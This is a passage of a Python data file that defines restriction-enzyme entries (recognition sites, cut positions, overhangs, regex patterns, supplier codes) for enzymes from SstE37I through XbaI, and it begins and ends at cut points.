'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGAAGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SstE37I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAGCTC'),
'compsite': '(?=(?P<SstI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'AGCT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['SstI'] = _temp()
def _temp():
return {
'charac': (8, 8, None, None, 'CCCG'),
'compsite': '(?=(?P<Sth132I>CCCG))|(?=(?P<Sth132I_as>CGGG))',
'dna': None,
'freq': 256.0,
'fst3': 8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCG',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sth132I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGACGAC'),
'compsite': '(?=(?P<Sth20745III>GGACGAC))|(?=(?P<Sth20745III_as>GTCGTCC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGACGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sth20745III'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCGG'),
'compsite': '(?=(?P<Sth302II>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sth302II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAGT'),
'compsite': '(?=(?P<SthSt3II>GAAGT))|(?=(?P<SthSt3II_as>ACTTC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SthSt3II'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGATG'),
'compsite': '(?=(?P<StsI>GGATG))|(?=(?P<StsI_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['StsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGGCCT'),
'compsite': '(?=(?P<StuI>AGGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'),
}
rest_dict['StuI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCNGG'),
'compsite': '(?=(?P<StyD4I>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCNGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['StyD4I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<StyI>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('C', 'J', 'N'),
}
rest_dict['StyI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACRGAG'),
'compsite': '(?=(?P<SurP32aII>AC[AG]GAG))|(?=(?P<SurP32aII_as>CTC[CT]GT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACRGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SurP32aII'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'ATTTAAAT'),
'compsite': '(?=(?P<SwaI>ATTTAAAT))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTTAAAT',
'size': 8,
'substrat': 'DNA',
'suppl': ('J', 'M', 'N', 'S'),
}
rest_dict['SwaI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'ACNGT'),
'compsite': '(?=(?P<TaaI>AC.GT))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACNGT',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TaaI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'ACGT'),
'compsite': '(?=(?P<TaiI>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'ACGT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TaiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCGA'),
'compsite': '(?=(?P<TaqI>TCGA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGA',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['TaqI'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'GACCGA'),
'compsite': '(?=(?P<TaqII>GACCGA))|(?=(?P<TaqII_as>TCGGTC))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACCGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['TaqII'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'CACCCA'),
'compsite': '(?=(?P<TaqIII>CACCCA))|(?=(?P<TaqIII_as>TGGGTG))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TaqIII'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'AATT'),
'compsite': '(?=(?P<TasI>AATT))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATT',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TasI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'WGTACW'),
'compsite': '(?=(?P<TatI>[AT]GTAC[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WGTACW',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TatI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GCSGC'),
'compsite': '(?=(?P<TauI>GC[CG]GC))',
'dna': None,
'freq': 512.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'CSG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCSGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TauI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GAWTC'),
'compsite': '(?=(?P<TfiI>GA[AT]TC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'AWT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAWTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TfiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCAAG'),
'compsite': '(?=(?P<TpyTP2I>ACCAAG))|(?=(?P<TpyTP2I_as>CTTGGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TpyTP2I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TTAA'),
'compsite': '(?=(?P<Tru1I>TTAA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTAA',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Tru1I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TTAA'),
'compsite': '(?=(?P<Tru9I>TTAA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTAA',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'M', 'R', 'V'),
}
rest_dict['Tru9I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CASTG'),
'compsite': '(?=(?P<TscAI>CA[CG]TG))',
'dna': None,
'freq': 512.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 10,
'ovhgseq': 'NNCASTGNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CASTG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TscAI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GTSAC'),
'compsite': '(?=(?P<TseFI>GT[CG]AC))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTSAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTSAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['TseFI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCWGC'),
'compsite': '(?=(?P<TseI>GC[AT]GC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'CWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCWGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TseI'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'TARCCA'),
'compsite': '(?=(?P<TsoI>TA[AG]CCA))|(?=(?P<TsoI_as>TGG[CT]TA))',
'dna': None,
'freq': 2048.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TARCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TsoI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GTSAC'),
'compsite': '(?=(?P<Tsp45I>GT[CG]AC))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTSAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTSAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Tsp45I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'ACNGT'),
'compsite': '(?=(?P<Tsp4CI>AC.GT))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACNGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Tsp4CI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRACGAC'),
'compsite': '(?=(?P<TspARh3I>G[AG]ACGAC))|(?=(?P<TspARh3I_as>GTCGT[CT]C))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRACGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TspARh3I'] = _temp()
def _temp():
return {
'charac': (16, 9, None, None, 'ATGAA'),
'compsite': '(?=(?P<TspDTI>ATGAA))|(?=(?P<TspDTI_as>TTCAT))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 16,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGAA',
'size': 5,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['TspDTI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'AATT'),
'compsite': '(?=(?P<TspEI>AATT))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATT',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TspEI'] = _temp()
def _temp():
return {
'charac': (16, 9, None, None, 'ACGGA'),
'compsite': '(?=(?P<TspGWI>ACGGA))|(?=(?P<TspGWI_as>TCCGT))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 16,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['TspGWI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCGGG'),
'compsite': '(?=(?P<TspMI>CCCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TspMI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CASTG'),
'compsite': '(?=(?P<TspRI>CA[CG]TG))',
'dna': None,
'freq': 512.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 10,
'ovhgseq': 'NNCASTGNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CASTG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TspRI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGNNNCTC'),
'compsite': '(?=(?P<TssI>GAG...CTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGNNNCTC',
'size': 9,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TssI'] = _temp()
def _temp():
return {
'charac': (-8, -25, 24, 7, 'CACNNNNNNTCC'),
'compsite': '(?=(?P<TstI>CAC......TCC))|(?=(?P<TstI_as>GGA......GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -25,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 24,
'site': 'CACNNNNNNTCC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TstI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGAC'),
'compsite': '(?=(?P<TsuI>GCGAC))|(?=(?P<TsuI_as>GTCGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGAC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TsuI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GACNNNGTC'),
'compsite': '(?=(?P<Tth111I>GAC...GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNGTC',
'size': 9,
'substrat': 'DNA',
'suppl': ('I', 'K', 'N', 'Q', 'V', 'X'),
}
rest_dict['Tth111I'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'CAARCA'),
'compsite': '(?=(?P<Tth111II>CAA[AG]CA))|(?=(?P<Tth111II_as>TG[CT]TTG))',
'dna': None,
'freq': 2048.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAARCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Tth111II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TCGTA'),
'compsite': '(?=(?P<UbaF11I>TCGTA))|(?=(?P<UbaF11I_as>TACGA))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGTA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF11I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTACNNNGTC'),
'compsite': '(?=(?P<UbaF12I>CTAC...GTC))|(?=(?P<UbaF12I_as>GAC...GTAG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTACNNNGTC',
'size': 10,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF12I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGNNNNNNCTGG'),
'compsite': '(?=(?P<UbaF13I>GAG......CTGG))|(?=(?P<UbaF13I_as>CCAG......CTC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGNNNNNNCTGG',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF13I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCANNNNNTCG'),
'compsite': '(?=(?P<UbaF14I>CCA.....TCG))|(?=(?P<UbaF14I_as>CGA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTCG',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF14I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TACNNNNNRTGT'),
'compsite': '(?=(?P<UbaF9I>TAC.....[AG]TGT))|(?=(?P<UbaF9I_as>ACA[CT].....GTA))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACNNNNNRTGT',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaF9I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGAACG'),
'compsite': '(?=(?P<UbaPI>CGAACG))|(?=(?P<UbaPI_as>CGTTCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGAACG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UbaPI'] = _temp()
def _temp():
return {
'charac': (-7, -11, 11, 7, 'GAGCTC'),
'compsite': '(?=(?P<UcoMSI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -11,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': 7,
'scd5': 11,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UcoMSI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GGNCC'),
'compsite': '(?=(?P<UnbI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GGNCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['UnbI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCKAAG'),
'compsite': '(?=(?P<Van9116I>CC[GT]AAG))|(?=(?P<Van9116I_as>CTT[AC]GG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCKAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Van9116I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCANNNNNTGG'),
'compsite': '(?=(?P<Van91I>CCA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Van91I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTAAAYG'),
'compsite': '(?=(?P<VchE4II>[AG]TAAA[CT]G))|(?=(?P<VchE4II_as>C[AG]TTTA[CT]))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTAAAYG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['VchE4II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNCYTAG'),
'compsite': '(?=(?P<Vdi96II>G.C[CT]TAG))|(?=(?P<Vdi96II_as>CTA[AG]G.C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNCYTAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Vdi96II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<Vha464I>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['Vha464I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTGCAC'),
'compsite': '(?=(?P<VneI>GTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['VneI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GGWCC'),
'compsite': '(?=(?P<VpaK11AI>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GGWCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['VpaK11AI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<VpaK11BI>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['VpaK11BI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATTAAT'),
'compsite': '(?=(?P<VspI>ATTAAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'R', 'V'),
}
rest_dict['VspI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACRAYC'),
'compsite': '(?=(?P<Vtu19109I>CAC[AG]A[CT]C))|(?=(?P<Vtu19109I_as>G[AG]T[CT]GTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACRAYC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Vtu19109I'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'CACRAG'),
'compsite': '(?=(?P<WviI>CAC[AG]AG))|(?=(?P<WviI_as>CT[CT]GTG))',
'dna': None,
'freq': 2048.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['WviI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CCTNNNNNAGG'),
'compsite': '(?=(?P<XagI>CCT.....AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNNNNNAGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XagI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RAATTY'),
'compsite': '(?=(?P<XapI>[AG]AATT[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RAATTY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['XapI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCTAGA'),
'compsite': '(?=(?P<XbaI>TCTAGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCTAGA',
'size': 6,
'substrat': 'DNA',
